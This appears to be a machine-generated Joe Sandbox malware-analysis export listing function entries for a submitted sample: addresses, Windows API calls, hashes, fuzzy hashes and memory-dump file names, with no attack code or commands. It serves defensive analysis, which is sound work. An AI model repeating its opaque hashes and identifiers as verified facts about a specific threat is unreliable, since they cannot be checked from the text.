                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
                                                                                                                                                      • String ID: %s %s$REPLACEFILEDLG
                                                                                                                                                      • API String ID: 485132379-439456425
                                                                                                                                                      • Opcode ID: 0db9669ef89c9c3c97b37f9590a3419d4d7cfb7de59eeaf35ca68f6e24993606
                                                                                                                                                      • Instruction ID: 2dd87a163ebb64821592c20619180ae158ad499f58d55d53797b2b81b7d5cbfd
                                                                                                                                                      • Opcode Fuzzy Hash: 0db9669ef89c9c3c97b37f9590a3419d4d7cfb7de59eeaf35ca68f6e24993606
                                                                                                                                                      • Instruction Fuzzy Hash: 8FA1A275900228BADB25EBB4DE46FEEB77CAF55300F0041E5F609A7082DA749F858B61
                                                                                                                                                      Function 00A5480E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __floor_pentium4
                                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                                                                      • Opcode ID: d6ed8f27dbcbb96b4b77075205e9132cd32dfc5acc1701711ff09988c0345332
                                                                                                                                                      • Instruction ID: 44ec8b022f2f3e6ef463edb787694cbae5b776135f65c333122d87026390e46f
                                                                                                                                                      • Opcode Fuzzy Hash: d6ed8f27dbcbb96b4b77075205e9132cd32dfc5acc1701711ff09988c0345332
                                                                                                                                                      • Instruction Fuzzy Hash: 6BC23871E086288BDB25CF28DD507EAB7B5FB48356F1541EAD80DE7240E774AE898F40
                                                                                                                                                      Function 00A23D9D Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _strlen.LIBCMT ref: 00A2438C
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A24523
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                                                                                      • String ID: CMT
                                                                                                                                                      • API String ID: 2172594012-2756464174
                                                                                                                                                      • Opcode ID: afd3ac4b6b585361376b1c1645cff8faccf04e29b19bcf4912ea63b69bb5975d
                                                                                                                                                      • Instruction ID: 28d10d6bfa57b2dd038274bbe3a24110609b412d45fe7e635d368495397d463a
                                                                                                                                                      • Opcode Fuzzy Hash: afd3ac4b6b585361376b1c1645cff8faccf04e29b19bcf4912ea63b69bb5975d
                                                                                                                                                      • Instruction Fuzzy Hash: 5B72D072A003548FCF18DF68D9917EA7BB1BF19300F08457DEC5A9B282DB74AA45CB61
                                                                                                                                                      Function 00A46878 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00A46884
                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00A46950
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A46970
                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00A4697A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                      • Opcode ID: 1a91da51473dc8c55fa16d32cbece52cba862a123dc3eba2aa955d751f8137b9
                                                                                                                                                      • Instruction ID: 620452581888dba0bceffb362e64ce79e364dfe4699ddc57e8a184c96b5e775c
                                                                                                                                                      • Opcode Fuzzy Hash: 1a91da51473dc8c55fa16d32cbece52cba862a123dc3eba2aa955d751f8137b9
                                                                                                                                                      • Instruction Fuzzy Hash: 35312979D453189FDB11DFA4D9897CCBBB8BF08301F1041AAE40CAB251EB719A858F45
                                                                                                                                                      Function 00A2932C Relevance: 6.0, APIs: 4, Instructions: 36windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32(?,?,00A2952D,?,00000040,00A2931E,00000001,?,?,?,?,0000001C,00A37618,00A6E0C8,WaitForMultipleObjects error %d, GetLastError %d,000000FF), ref: 00A29330
                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,00000000,00000000,00000000,?,?,00A2952D,?,00000040,00A2931E,00000001,?,?), ref: 00A29351
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A29360
                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00A6E0C8,?,?,00A2952D,?,00000040,00A2931E,00000001,?,?,?,?,0000001C), ref: 00A29373
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFormatFreeLastLocalMessage_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 991192900-0
                                                                                                                                                      • Opcode ID: bcac6ff74770da6fbbac8521813f0cd758f185c92ce25be19d04afb13c461604
                                                                                                                                                      • Instruction ID: c4e633301dfcd2a15379ff70c7c0ab6c9be2426282ce3bafe6d51d53f4b5e896
                                                                                                                                                      • Opcode Fuzzy Hash: bcac6ff74770da6fbbac8521813f0cd758f185c92ce25be19d04afb13c461604
                                                                                                                                                      • Instruction Fuzzy Hash: 54F08279500314FFEB04DBA5AE05EFF77BCEB85B91B108029F502AA1D0CA709E019674
                                                                                                                                                      Function 00A44E14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualQuery.KERNEL32(80000000,00A44D59,0000001C,00A44F4E,00000000,?,?,?,?,?,?,?,00A44D59,00000004,00A75D84,00A44FDE), ref: 00A44E25
                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00A44D59,00000004,00A75D84,00A44FDE), ref: 00A44E40
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InfoQuerySystemVirtual
                                                                                                                                                      • String ID: D
                                                                                                                                                      • API String ID: 401686933-2746444292
                                                                                                                                                      • Opcode ID: aa89df3697d656e732d0d23f8185e58c41ad3a17982e42d234216e82e9e21b54
                                                                                                                                                      • Instruction ID: 9817d5eb9085d7ad7fc4029c74905fcbc38736422ba0a054de877a5cc0592de5
                                                                                                                                                      • Opcode Fuzzy Hash: aa89df3697d656e732d0d23f8185e58c41ad3a17982e42d234216e82e9e21b54
                                                                                                                                                      • Instruction Fuzzy Hash: FA01F7366002096BCB14DF69CC06BEE7BA9BFC8338F0CC225ED19DB255D734D8028680
                                                                                                                                                      Function 00A4AAC4 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00A4535E), ref: 00A4ABBC
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00A4535E), ref: 00A4ABC6
                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00A4535E), ref: 00A4ABD3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                      • Opcode ID: 5fa5b98a079500dcb6478d8b3b9d3ae1921a152965029fd2026d530f38c07cc7
                                                                                                                                                      • Instruction ID: 4638825408c962047d766f84887fc80ea20c77c3eb56d2b92272962625012d34
                                                                                                                                                      • Opcode Fuzzy Hash: 5fa5b98a079500dcb6478d8b3b9d3ae1921a152965029fd2026d530f38c07cc7
                                                                                                                                                      • Instruction Fuzzy Hash: 7C31C2749412189BCB21DF68D9887DDBBB8BF48310F5042EAE41CA6261EB709F818F45
                                                                                                                                                      Function 00A51FF8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: .
                                                                                                                                                      • API String ID: 0-248832578
                                                                                                                                                      • Opcode ID: 23d1f0908d4f0aefaa0d62c2a992684e258feccb5e77815556c9698de1098bce
                                                                                                                                                      • Instruction ID: 0f3afce7c9dc9185c6f8ef5c530bc0f38d4de91a2941c69760eaa48c47212db4
                                                                                                                                                      • Opcode Fuzzy Hash: 23d1f0908d4f0aefaa0d62c2a992684e258feccb5e77815556c9698de1098bce
                                                                                                                                                      • Instruction Fuzzy Hash: 6A31E4729002496FDB24DF78CC84EFB7BBDEB86315F140298F91997291E6319E49CB50
                                                                                                                                                      Function 00A54360 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                                                                                                                                      • Instruction ID: e08cc467122a8d67e587e2c0bc54fb69b04f7d0e30ea1f9784c53e976b32c0f5
                                                                                                                                                      • Opcode Fuzzy Hash: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                                                                                                                                      • Instruction Fuzzy Hash: C1023B71E002199BDF14CFA9C9806ADBBF1FF89315F258269D919E7285D730AD458B80
                                                                                                                                                      Function 00A3FD34 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A3FD6A
                                                                                                                                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,00A69714,?,?), ref: 00A3FDB3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FormatInfoLocaleNumber
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2169056816-0
                                                                                                                                                      • Opcode ID: d0f8f020630884b195988430705ecf836a8de12e09edfb2d0b25f461f6a675cb
                                                                                                                                                      • Instruction ID: 01e2992c377381894d0d6ee4db278d26ef1a046337d17ec2790ecb04991cb97a
                                                                                                                                                      • Opcode Fuzzy Hash: d0f8f020630884b195988430705ecf836a8de12e09edfb2d0b25f461f6a675cb
                                                                                                                                                      • Instruction Fuzzy Hash: 2B112A75620348ABDB10DFB0DD45BAB77F8EF08714F004429F505A7151E6B0A949D765
                                                                                                                                                      Function 00A248AA Relevance: 2.0, Strings: 1, Instructions: 776COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: CMT
                                                                                                                                                      • API String ID: 0-2756464174
                                                                                                                                                      • Opcode ID: e3bb1f6b53078ea410d6ff5a7573146690e170f1b67345f54c7708c5e6b6334c
                                                                                                                                                      • Instruction ID: 7900fa9f4c865f1d089eee0ea8378bdac8045224d2beaa456177cd78df8bf763
                                                                                                                                                      • Opcode Fuzzy Hash: e3bb1f6b53078ea410d6ff5a7573146690e170f1b67345f54c7708c5e6b6334c
                                                                                                                                                      • Instruction Fuzzy Hash: 0C62D471A00659AFDF08DF78D991BED7BA4BF19300F084179FC059B286DB74AA44CBA1
                                                                                                                                                      Function 00A586D2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A586CD,?,?,00000008,?,?,00A5836D,00000000), ref: 00A588FF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                                      • Opcode ID: 3a0f7129811a8356946f969e59a55bee94bf34a71d18e43987de03f1a29cc059
                                                                                                                                                      • Instruction ID: 9492c0a4cdfd292f0007ca00cf82479cf78cecf610cebbd808bc1ef117da420d
                                                                                                                                                      • Opcode Fuzzy Hash: 3a0f7129811a8356946f969e59a55bee94bf34a71d18e43987de03f1a29cc059
                                                                                                                                                      • Instruction Fuzzy Hash: 22B17E31610608DFD715CF28C486B647BE0FF45366F298658EC9ADF2A2CB39D986CB41
                                                                                                                                                      Function 00A46694 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00A466AA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                      • Opcode ID: 412fd2b4e2c3b1d2cda6b3c8ab0154cee76117f12b83b54fdca5639a5fb81f67
                                                                                                                                                      • Instruction ID: 61536173b4f50ed50dba87ed62462fab0c151aa30c780a6aeb125f81a7e8d3ec
                                                                                                                                                      • Opcode Fuzzy Hash: 412fd2b4e2c3b1d2cda6b3c8ab0154cee76117f12b83b54fdca5639a5fb81f67
                                                                                                                                                      • Instruction Fuzzy Hash: 8951EAB6A10604CFEF18CFA8D8857AEBBF4FB89314F20C52AC404EB261D3B49941CB50
                                                                                                                                                      Function 00A303BE Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00A303ED
                                                                                                                                                        • Part of subcall function 00A30469: __EH_prolog3.LIBCMT ref: 00A30470
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3Version
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2775145068-0
                                                                                                                                                      • Opcode ID: 1719b2b56d8de5fbc80cc041e809d783333fbae1f21b7f342537890d86d5cc6f
                                                                                                                                                      • Instruction ID: 568a549f1896cd951973a530765cb27ee9560aae7820c8a3af76e21f62b0e132
                                                                                                                                                      • Opcode Fuzzy Hash: 1719b2b56d8de5fbc80cc041e809d783333fbae1f21b7f342537890d86d5cc6f
                                                                                                                                                      • Instruction Fuzzy Hash: 03F0AF3484824C8EEB24DFB4FC29BE9BBB46B11309F004468E60627252EBF4568E8B11
                                                                                                                                                      Function 00A25AFE Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: gj
                                                                                                                                                      • API String ID: 0-4203073231
                                                                                                                                                      • Opcode ID: e61efb068adaae442e0d154f82e206b15e4628830b77e1a72a0ae9e685437055
                                                                                                                                                      • Instruction ID: 3af507ce2c858ecb93faefd2cc232db03680a36394e0259d6bf66a2f2f3dde52
                                                                                                                                                      • Opcode Fuzzy Hash: e61efb068adaae442e0d154f82e206b15e4628830b77e1a72a0ae9e685437055
                                                                                                                                                      • Instruction Fuzzy Hash: BCD114B2A083458FC354CF29D88065AFBE2BFC9308F59492EE998D7305D734A955CF86
                                                                                                                                                      Function 00A46A0B Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00026A20,00A46445), ref: 00A46A10
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
